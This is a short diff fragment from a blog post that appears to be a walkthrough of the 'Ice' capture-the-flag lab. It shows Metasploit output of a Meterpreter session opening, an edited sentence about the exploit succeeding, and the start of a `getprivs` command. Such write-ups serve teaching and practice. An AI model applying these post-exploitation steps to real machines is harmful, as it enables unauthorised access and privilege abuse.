bharathkarumudi/bharathkarumudi.github.io/_posts/2020-07-20-Ice-thm-walkthrough.md

 [*] Meterpreter session 2 opened (10.2.18.4:4444 -> 10.10.88.122:49748) at 2020-07-20 20:31:18 -0400
 [*] Cleaning up registry keys ...
 ```
-The exploit ran successfully and we can see the privileges by running `getprivs`.
+The exploit ran successfully and we can also see the privileges by running the `getprivs`.

 ```bash
 meterpreter > getprivs